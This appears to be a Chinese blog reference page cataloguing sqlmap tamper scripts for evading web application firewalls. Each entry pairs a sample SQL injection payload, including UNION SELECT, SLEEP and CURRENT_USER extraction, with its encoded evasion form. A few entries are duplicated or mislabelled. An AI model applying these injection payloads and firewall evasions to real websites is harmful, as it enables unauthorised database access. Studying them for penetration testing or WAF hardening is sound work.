使用sqlmap中的tamper脚本绕过waf
使用sqlmap中tamper脚本绕过waf
脚本名:0x2char.py
作用:用UTF-8全角对应字符替换撇号字符
作用:用等价的CONCAT(CHAR(),...)对应替换每个(MySQL)0x <hex>编码的字符串
测试对象:
- MySQL 4,5.0和5.5
>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
脚本名:apostrophemask.py
作用:用UTF-8全角对应字符替换撇号字符
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
脚本名:apostrophenullencode.py
作用:用它的非法双字节替代撇号字符
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
脚本名:appendnullbyte.py
作用:在有效负荷末尾追加编码的空字节字符
需求:
- Microsoft Access
笔记:
- 用于在后端绕过弱Web应用程序防火墙时使用
- 数据库管理系统是Microsoft Access
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
脚本名:base64encode.py
作用:用base64编码替换
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
脚本名:between.py
作用:
- 用'NOT BETWEEN 0 AND#'代替大于运算符('>')
- 用'BETWEEN#AND#'代替等号运算符('=')
测试对象:
- Microsoft SQL Server 2005
- MySQL 4,5.0和5.5
- Oracle 10g
- PostgreSQL 8.3,8.4,9.0
笔记:
- 有效绕过弱的Web应用程序防火墙过滤大于字符
- BETWEEN子句是SQL标准。 因此,这个篡改脚本应该针对所有数据库
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
脚本名:bluecoat.py
作用:用有效的随机空白字符替换SQL语句后的空格字符,之后用操作符LIKE替换字符'='
需求:
- 如WAF文件所述,WAF激活的Blue Coat SGOS
测试对象:
- MySQL 5.1,SGOS
笔记:
- 用于绕过Blue Coat推荐的WAF规则配置
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
脚本名:chardoubleencode.py
作用: 双重网址编码给定有效负载中的所有字符(不处理已经编码的)
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
脚本名:charencode.py
作用:Url对给定有效负载中的所有字符进行编码(尚未处理编码)
测试对象:
- Microsoft SQL Server 2005
- MySQL 4,5.0和5.5
- Oracle 10g
- PostgreSQL 8.3,8.4,9.0
笔记:
- 非常有用,可以绕过非常弱的Web应用程序防火墙在通过其规则集处理请求之前对请求进行url解码
- Web服务器无论如何都会通过url解码,因此它应该对任何DBMS都有效
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
脚本名:charunicodeencode.py
作用:字符串 unicode 编码
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
脚本名:equaltolike.py
作用:like 代替等号
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
脚本名:space2dash.py
作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
脚本名:greatest.py
作用:绕过过滤’>’ ,用GREATEST替换大于号。
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0
脚本名:space2hash.py
作用:空格替换为#号 随机字符串 以及换行符
>>> tamper('1 AND 9227=9227')
'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
脚本名:halfversionedmorekeywords.py
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
脚本名:space2morehash.py
作用:空格替换为 #号 以及更多随机字符串 换行符
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
脚本名:ifnull2ifisnull.py
作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
脚本名:space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0BFROM%0Cusers'
脚本名:space2mssqlhash.py
作用:替换空格
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
脚本名:modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
脚本名:space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0BFROM%0Cusers'
脚本名:space2mysqldash.py
作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
注:之前有个mssql的 这个是mysql的
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
脚本名:multiplespaces.py
作用:围绕SQL关键字添加多个空格
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
脚本名:space2plus.py
作用:用+替换空格
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
脚本名:nonrecursivereplacement.py
作用:双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
脚本名:space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
脚本名:sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
脚本名:unionalltounion.py
作用:替换UNION ALL SELECT为UNION SELECT
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
脚本名:randomcase.py
作用:随机大小写
>>> tamper('INSERT')
'INseRt'
脚本名:unmagicquotes.py
作用:宽字符绕过 GPC addslashes
>>> tamper("1' AND 1=1")
'1%bf%27-- '
脚本名:randomcomments.py
作用:用/**/分割sql关键字
>>> tamper('INSERT')
'I/**/N/**/SERT'
脚本名:securesphere.py
作用:追加特制的字符串
>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
脚本名:versionedmorekeywords.py
作用:注释绕过
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
脚本名:space2comment.py
作用:使用注释替换空格字符
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
脚本名:halfversionedmorekeywords.py
作用:关键字前加注释
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
使用sqlmap中的tamper脚本绕过waf的更多相关文章
- 使用sqlmap中tamper脚本绕过waf
使用sqlmap中tamper脚本绕过waf 刘海哥 · 2015/02/02 11:26 0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap- ...
- sqlmap中tamper脚本绕过waf
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击. 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习. 根据sqlmap中的tamper脚本可以学习过绕过一些技 ...
- sqlmap的常用tamper脚本
sqlmap下的tamper目录存放绕过WAF脚本 使用方法 --tamper 脚本名称,脚本名称 多个tamper脚本之间用空格隔开 apostrophemask.py 用utf8代替引号 equa ...
- 通过HTTP参数污染绕过WAF拦截 (转)
上个星期我被邀请组队去参加一个由CSAW组织的CTF夺旗比赛.因为老婆孩子的缘故,我只能挑一个与Web漏洞利用相关的题目,名字叫做”HorceForce”.这道题价值300点.这道题大概的背景是,你拥 ...
- sqlmap注入之tamper绕过WAF脚本列表
本文作者:i春秋作者——玫瑰 QQ2230353371转载请保留文章出处 使用方法--tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrop ...
- 关于sqlmap当中tamper脚本编码绕过原理的一些总结(学习python没多久有些地方肯定理解有些小问题)
sqlmap中tamper脚本分析编写 置十对一些编码实现的脚本,很多sqlmap里面需要引用的无法实现,所以有一部分例如keywords就只写写了几个引用了一下,其实这里很多脚本运用是可以绕过安全狗 ...
- 【奇淫巧技】sqlmap绕过过滤的tamper脚本分类汇总
sqlmap绕过过滤的tamper脚本分类汇总
- sqlmap tamper脚本
本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...
- 如何使用SQLMAP绕过WAF
WAF(web应用防火墙)逐渐成为安全解决方案的标配之一.正因为有了它,许多公司甚至已经不在意web应用的漏洞.遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMa ...
随机推荐
- @codechef - BIKE@ Chef and Bike
目录 @description@ @solution@ @accepted code@ @details@ @description@ 输入 n(n ≤ 22) 个点,m(m ≤ 8000) 个边.每 ...
- [C#] 查标准正态分布表
C#里面要计算正态分布是一件比较麻烦的事情,一般是通过查表来实现的. static double[] ayZTFB = null; /// <summary> /// 计算标准正态分布表 ...
- 解锁当前XXX用户
pam_tally2 查看当前锁账户 pam_tally2 --user=XXX用户 --reset 解锁当前XXX用户
- day1-初识Python之变量
1.python安装与环境配置 1.1.Windows下的python解释器安装 打开官网 https://www.python.org/downloads/windows/ 下载中心 测试安装是否成 ...
- C++ 第四次作业 继承
继承 继承时从新的类从已有类那里得到新的特征.继承实现了代码的重用,极大地减少了代码量,同时通过新增成员,加入了自身的独有特性,达到了程序的扩充. 派生类继承了基类的全部数据类和除了构造函数.析构函数 ...
- Python:pip 和pip3的区别
前言 装完python3后发现库里面既有pip也有pip3,不知道它们的区别,因此特意去了解了一下. 解释 先搜索了一下看到了如下的解释, 安装了python3之后,库里面既会有pip3也会有pip ...
- linux一些重要数据结构
如同你想象的, 注册设备编号仅仅是驱动代码必须进行的诸多任务中的第一个. 我们将很 快看到其他重要的驱动组件, 但首先需要涉及一个别的. 大部分的基础性的驱动操作包括 3 个重要的内核数据结构, 称为 ...
- P1057 迷宫路径
题目描述 定义一个二维数组: int maze[5][5] = { 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, ...
- java 反射实现框架功能
框架与框架要解决的核心问题 我做房子卖给用户住,由用户自己安装门窗和空调,我做的房子就是框架,用户需要使用我的框架,把门窗插入进我提供的框架中.框架与工具类有区别,工具类被用户的类调用,而框架则是调用 ...
- jQuery 工具类函数-检测浏览器是否属于W3C盒子模型
浏览器的盒子模型分为两类,一类为标准的w3c盒子模型,另一类为IE盒子模型,两者区别为在Width和Height这两个属性值中是否包含padding和border的值,w3c盒子模型不包含,IE盒子模 ...